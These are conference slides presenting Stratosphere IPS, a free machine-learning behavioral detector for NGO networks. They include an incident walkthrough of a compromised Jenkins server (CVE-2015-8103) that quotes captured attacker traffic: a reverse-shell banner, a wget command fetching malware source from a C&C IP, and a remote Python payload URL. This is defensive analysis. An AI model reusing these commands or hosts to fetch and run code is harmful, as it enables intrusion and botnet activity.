Stratosphere IPS

The free machine learning malware detection for the community

Sebastian Garcia - CTU University, Prague

@eldracote

sebastian.garcia@agents.fel.cvut.cz

https://stratosphereips.org

Live Slides: bit.ly/ekoparty2016

NGOs are at risk

Problems in NGOs Security

• Highly political targets.

• Attacked by powerful actors

• No resources.

• Not their goal.

• Strong concerns about their privacy.

• Concerns about Trust.

Stratosphere IPS

https://stratosphereips.org/

Free

Software

Machine

Learning

Behavioral

IPS

Protecting

NGOs

Stratosphere Goals

• To put machine learning techniques in the hands of the civil society.

• To offer this detection service to NGOs for free.

• To focus on what computers are doing, not the attacks they receive.

Stratosphere Tech Principles

• Less is More

  • Analyze the behavior of groups of flows.

• Disassociate

  • Representation of behavior from detection.

• Verify

  • With real and labeled datasets.

About Behaviors

• Your behavior is usually the same when connecting with the same service.

• Group flows going to a specific service by ignoring the source port. We call it a connection.

• The connection, composed of several flows, now shows a behavior in time.

Network Behaviors

• Model network behaviors as a string of letters.

• 1 flow        3 features         1 letter

Malware Behaviors

• Malware mostly generate the same behaviors.

• Changing the behavior is costly for the attacker.

• These behaviors do not expire quickly.

• Malware Open Data

  • https://stratosphereips.org/category/dataset.html

Behavior of Connections

Markov Chains Models

• Create, train and store a Markov Chain models

Behavioral Detection

Trained

Markov Models

Similarity to Unknown Traffic

Real Detection Example

Example Detection

• January 18th, 2016.

• Got an alert from a malicious behavior.

147.32.xx.xx-23.247.5.27-25000-tcp [Global Frag Networks,US]: 88,H,H,h,H,H,h,h,h,h,h,H,h,H,H,H,H,H,H,H,H,H,H,H,H,H,h,h,h,h,H,

"For a long time there was a periodic connection (freq 5s-60s), to an uncommon port, with large flows of medium duration."

The Detected Connection

Sent: "+.............P.43.249.81.135.......?."
Recv once:  "import time as O000OO0O0O00OO00O"

• 43.249.81.135

  • No VirusTotal detection.

  • AS58879 Shanghai Anchang Network Security Technology Co.,L. China.

  • Last known domain: lyzqmir2.com. Minecraft server.

The Beginning

• 103.242.134.118 port 33333/TCP [VT:7]​

  • S:"/bin/sh: 0: can't access tty; job control turned off.$,"

  • S:"tomcat6 17547 0.0 0.0 7944 868 ? S 13:36 0:00 grep abcc.$

  • S:"wget 23.247.5.27:435/abcc.c"

• 23.247.5.27 port 25000/TCP (main CC)

  • "=...-== Love AV ==-:..Linux 3.2.0-4-amd64"

• Python Script (Deobfuscated by Veronica Valeros Thx!)

  • "http://222.179.116.23:8080/theme/1/pys.py"

Is it Attacking?

• Hundreds of connections to IPs in China, port 80/UDP.

• 115.239.248.88 port 80/UDP [MoveInternet Network Technology Co.,Ltd.,CN]

  • Few Kb of binary data sent.

  • No apparent explanation.

The Attack Conclusion

• Strange POSTs to Jenkins minutes before

  • POST /jenkins/descriptor/hudson.model.DownloadService/...

• Remote Jenkins code execution vulnerability CVE-2015-8103. Metasploit module.

• C&C channel with 10s timeouts.

• ​Receives orders and executes OS commands

• Function to send random UDP data to IPs.

• Similar to BillGates botnet, not quite.

What to do with this?Stratosphere Data Analysis Service

Stratosphere Data Analysis

• Cloud-based detection service for NGOs.

• Add new algorithms continually.

• Update the models.

• Verify the detections if necessary.

• We sign NDAs, NGOs can send the Flows or only the letters! Privacy matters.

New Algorithms

• Anomaly Detection

  • New feature in behavioral letters.

• Malicious HTTPs detection.

• Graph Analysis of sequential connections.

• WHOIS similarity grouping.

• P2P behavior

• Behavioral Patterns of the Host.

Example of Graph Analysis

Organizations working with us

• People In Need. CZ. Helping 22 countries. Human-rights, war, etc.

• CZ.NIC. Manager of .cz and Turris Project. 2,000 Internet Networks.

• ICT help for policy makers in 20 African Countries

• CTU University. With more than 7,000 hosts.

Want to help NGOs?

• Are you researching in network security?

• Like network security analysis?

• Know NGOs that are are risk in Latin America? Suggest them to us.

• Know activists or journalists under attack? Tell us.

• We are already working with researchers in Argentina. Help the project.

Conclusion

• NGOs need our help.

• Trust and openness is essential.

• Continuous visibility and analysis is paramount.

• Behavioral Machine Learning is improving.

Questions? And Thanks!